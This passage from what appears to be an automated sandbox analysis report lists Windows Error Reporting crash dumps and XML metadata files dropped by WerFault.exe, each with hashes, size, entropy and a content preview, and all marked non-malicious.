                                                      SSDEEP:192:uFKJKV6djYtOPogXqOSYl+5LS6RApVcHFU5ypb8ioqGQQTa6/oEPlfL9RcQKFIso:CI/j/PRaX51d1baqKl/5NfC
                                                      MD5:AA194C00C67DE2540AE59E940F6F46A4
                                                      SHA1:33A1F256A8527E66DC0571F0AA5B10D01B3026E6
                                                      SHA-256:990933F9619218F4B5541CBC0DD310E6E1E225A7324CED7FCBF479413E7F06AD
                                                      SHA-512:9F42F9EB4424413264D9DB66CDF958013B35EA5FC2CA34566A281C4A408F3B43F4FB4337E617B9F71FCE62725F3BB484067C7C4482AC33628E92FCBC66B525D9
                                                      Malicious:false
                                                      Preview:MDMP....... .......1|;c........................4................:..........T.......8...........T...............@-...........................................................................................U...........B......t.......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D32.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.697908602409422
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cw6IMZrX66YA2SUW7kgmfB/SUCpB189buNsfuam:RrlsNiD6IMZL66YBSUgkgmf5SsuGfq
                                                      MD5:13EC2C2FC518AEC18D5CD78923429D1E
                                                      SHA1:7BF74E05D79F755ABE8BD71519AF766916CB5C49
                                                      SHA-256:E4E31BBAEA139BAE2B31AFC712805E0BCCD8C45D66306A66B76629E8A6942175
                                                      SHA-512:F66917FDAE85BBFC8A3AE3611E311C600D162559D316A878ED34877FD7AF30EEAA25CD56054496FA15B7CC7929899EC5F9301CBCC5B7EAA4D3CBBB0E6A7E2314
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DA1.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.471518242701876
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjiM8fm8M4JbFZF3TB+q86f1urZMjTCd:uITfaH7PgrsqYuxJxL9T1urZMXCd
                                                      MD5:4E315637F6FA74E511985200D2E5A82D
                                                      SHA1:147F2483526EAA1D3B6FF941DB49A2D466AA9E2A
                                                      SHA-256:137F3CE0F82A9C99F322A6B5D1EC43DF03E766F035661EF2AD3B3F7BBF1D7563
                                                      SHA-512:281B7F4DF7056ADD49393166B38E955F9C49BB549D1AA8B2973182D8A6259F461026D4BC7B6C7430B803AF649698B0EFCE34CC41FC6FE2FDB065476C17D3EDBC
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER90A7.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:21:09 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):120862
                                                      Entropy (8bit):2.0456757856627403
                                                      Encrypted:false
                                                      SSDEEP:384:ry9rz3hPzrQqJl+chBi+2qSl/1S6Rh1ac4/vMCv50d9Hr6Y:ryrPznFtSlNBZ4n/er7
                                                      MD5:01528BDD0E247EE9C6BC1B3370BCDD96
                                                      SHA1:CFF4475D8EA7963C7A8601B28E8A9ECB8BD9E209
                                                      SHA-256:46D91EF21DB9D5B551BE415AD19979A3D75A0477617E837E06855B588E6D1B6F
                                                      SHA-512:E0BCF582FE70F09395566949B21A79555105E82C47253E08FAE5BBDD4728F04D25DEB6E3202524AD79375FD56C17C84A192FD78A6994B3BBE8EF1F29C1C82C3F
                                                      Malicious:false
                                                      Preview:MDMP....... .......u|;c............t...............|............Q..........T.......8...........T...........x=...............!..........x#...................................................................U...........B.......$......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9490.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8338
                                                      Entropy (8bit):3.6988252114556937
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cs6hG6YANSUuvgmfB8SR1ACpBP89bHNsfhNm:RrlsNif6A6Y6SUuvgmf2STaHGfi
                                                      MD5:CE7B45555F4C5ECCE82DE99F5B664475
                                                      SHA1:2E3665828D5EA3FA1D14D8A0FD400DF5F7BA4DAE
                                                      SHA-256:DC276A0252F8927D388D4A52F736BA8514C5CE9C61A57EC5B3A1005C5DCD20EF
                                                      SHA-512:F77FD51FE7A8AA83E06E868FD9C4A32D8E3E3FCEA0C27F76C8700E89A2911F6EB35C15A77201CF15F0869AFE63A3F41A00E2D95D6F1A111C874E5D193EE5D7FA
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER94FF.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.469443217482524
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs7JgtWI9AuWgc8sqYjZ8fm8M4JbgZFX+q8Jf1urZMjTCd:uITfV7PgrsqYqJc7G1urZMXCd
                                                      MD5:4EB735431C6B537EC08F8AB0C581C511
                                                      SHA1:28014BC567E985E193F99F3C93AAC5C8CF9415B9
                                                      SHA-256:CDB583567AF42B2FC1E632914F01BD88140CFE9127EFC1A69FECCB4D269C3337
                                                      SHA-512:482C53E564F3E736578D7E33BD2ADC855422D164C5E7265C85B349D90A11F074EE4FB3C2EBA42F9EFF4CB6C8EC1DCDDADDCF2277855E146FDEB70C810EC70235
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719931" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER97E0.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:20:05 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):91454
                                                      Entropy (8bit):1.998929385230397
                                                      Encrypted:false
                                                      SSDEEP:384:4dlbKPxf4hmKzg3A6PODfqKl/pfRWm2MBOXz/RJKifK11qVeat:4doPxfiv0w7uKlxoH
                                                      MD5:8288390AA04A87BC03DFA783D955B6A9
                                                      SHA1:79F3011F754233799B7DF8E2F6F62289A76F9730
                                                      SHA-256:177AA9AA7AB2ED1E566229187A3762F96D01E0D9D0563F32418D4FE576BA25F0
                                                      SHA-512:6373F083778F93AF856AB3FEE7FC71E572F3E8D2776B8C3ED033B32088346AB71598FDFBEC7B7F155518190A3D26175536236406686F97E78B235B31F89ABFA2
                                                      Malicious:false
                                                      Preview:MDMP....... .......5|;c........................x...............D?..........T.......8...........T...........P$...@..........d...........P....................................................................U...........B..............GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AFE.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.697537999305797
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cy6I1Y6YAvSUKPgmfB/SUCpBZ89bKNsf00Om:RrlsNiR6I1Y6YYSUKPgmf5SoKGft
                                                      MD5:329422C24F95B94CD9E23FA48606E0AE
                                                      SHA1:8786104FF2FD01B790E2CF1782636DC14BD1433A
                                                      SHA-256:632279BE60F13436E212724097DAF8BF0F8BEFCCD830AF33E93EC93E4D693195
                                                      SHA-512:05F4BF431DAB295E5BC43930B021149C0BE662C592590A86FAFB80A1E7E9D94BB9BF322B305C9A34A75246C60A5BD0CD2AF8ED553526BCA5D632D1CF5B213458
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B9B.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.469322293158411
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjN8fm8M4JbFZFvL+q86f1urZMjTCd:uITfaH7PgrsqY+JxzLT1urZMXCd
                                                      MD5:E599D72E1769199534FAF60EFBC74404
                                                      SHA1:C41E366AB619ED4B67F3A788799264A4C297EDD9
                                                      SHA-256:F7775EFED872332C34B14ADC9C124B177DE7DA6DFAF6AB1C08D39B36B5CC8401
                                                      SHA-512:E7B1510C0DC13D0172D27D44293B5117BCD481F5A32F3DA9FC7B238C2F32E59771C6401396D5E0C3EAA469D93D007914F7F62C1D319EDCF19514C624C8D851A7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA51E.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:20:08 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):103340
                                                      Entropy (8bit):2.0860910131609742
                                                      Encrypted:false
                                                      SSDEEP:384:wQGjO9fPC+uBMHnFDgHoo46WOaBDfqKl/pG27HQct8femn:wQtlPduBMHSGHBuKlxfwL
                                                      MD5:4E01E65482E457E8369490358E681B54
                                                      SHA1:6A4DB5E8AFB0DF8ADBB14AE99592B9F27566921B
                                                      SHA-256:19404307AE0CF27BC9B6F2F36045DD930A3B143993214280B9CD052E67F5FBBA
                                                      SHA-512:3543791546F9E0D7DA2ECF5637803EDF46C050D392933EEA37FD8690F88B436FEAB986826CC1CF8498FAB5A68FB794716EA3F57BA39236CC10A23B4B4BA329AA
                                                      Malicious:false
                                                      Preview:MDMP....... .......8|;c.........................................C..........T.......8...........T............)...i...........................................................................................U...........B......\.......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA781.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.6964781586218396
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5CH6Iqwv6YAFSUhogmfB/SUCpBkx89b/Nsfd6X1m:RrlsNi06IqQ6YSSUhogmf5Sp/GfdR
                                                      MD5:1E340CAD3A9DFB2D3C63F7B8DEDE1936
                                                      SHA1:4A390DBDCA447C8C6EAB1CEBBE7B9D4A75EEDD20
                                                      SHA-256:1804EE3CB200B63B0D028DBD67E253575B92E973ADB1BF35F9BB819C9F5C7DD7
                                                      SHA-512:DD42C0CDF6EE86405CE9E091560AA5795C737861576C0C7509B42D71F07F30BBCED2DEE3CFABA04D842DB2EF10D85DCA04FA2A397B4F7C9E563CF397A50D4E5B
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA80E.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.471858838671925
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjX8fm8M4JbFZFS+q86f1urZMjTCd:uITfaH7PgrsqY4Jx+T1urZMXCd
                                                      MD5:C0D4439E6B43BC0C27F2E422F2B055A7
                                                      SHA1:75A16E597F8EC00F6C7439E1D5E233A9181EA0AC
                                                      SHA-256:D155F00555AEF686312D9D2D18F97C302FE15430A020982001148D8E1AA398B0
                                                      SHA-512:0940A1E2135242982AC1A2E601DE490FC3CC9CFFDF8CF9D9DFE425835FFFDF15B7F4218F6B8E2028C72CE251F71E5AF62D210742F215FCDFE36D3C1C488C4D85
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0A7.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:20:11 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):107076
                                                      Entropy (8bit):1.981513717445772
                                                      Encrypted:false
                                                      SSDEEP:384:2UDzGsPrrC4Sr7gHi9QxWHDfqKl/x5WwJY8rGs:2UFPrrC4SwbouKlpy8a
                                                      MD5:8CC6C3B465EC9206FDF33AD935C109F7
                                                      SHA1:AD16E6624E9A84712227CCC133EBA1E6248ABFAA
                                                      SHA-256:180239FCB2FBAE962CDEF3CEF001FCDA87CE7CA140FD5853838CAA771493AF40
                                                      SHA-512:1B6B4A721B52416236E50FD920B934FFE905DB0E3A3A751E4BECFD41FA7B2F7C2289C5D87EDD6D586F22552A5FE3D0A99C93C9516EDF1EA504561BC0BFE414EE
                                                      Malicious:false
                                                      Preview:MDMP....... .......;|;c............D...............L............G..........T.......8...........T...........p,...u...........................................................................................U...........B......d.......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB55C.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.698489742726526
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cr6IKP6YA4SU1ujgmfB/SUCpBs89bUNsfM8m:RrlsNio6IKP6Y/SU4jgmf5SnUGfO
                                                      MD5:7F7BE39FB55CBD0F3798C4D535AB6AE1
                                                      SHA1:D1477EF235F7B5DBF3F3DCC27A109C74F299C1F2
                                                      SHA-256:81EECB9529464D398E08917AC29E768E080369B7FD1321A791B4200836DFC1EC
                                                      SHA-512:EC0CB108814DDECD39E22720C74BAE932BB6431EA3331B2A9399D753FBDAECD9CA4D10A27956D85623CD147CFFE157BA01269FAA6EF1C6D95B9106A09CCB092D
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB685.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.470884040803658
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjd8fm8M4JbFZFR+q86f1urZMjTCd:uITfaH7PgrsqYOJxlT1urZMXCd
                                                      MD5:0AA8E7343AE2CD5BBA967CD244E82054
                                                      SHA1:F0E5FA344DCD8270F8C59C7F1BAA68AACCC00047
                                                      SHA-256:7A1105A1F3E702EC5E3EA275F1DF9EE6493278AFBAAC814538E5659D0F6377B7
                                                      SHA-512:DB8E1CAD1A4DEE8C37F0E1ABD19D5088BDEC857595575064E69021ADE12A60998EE20FC69E49BD9B199D0BEB0810AF9E4F1198C9D0587CAEB5EFC2807B452CBD
                                                      Malicious:false
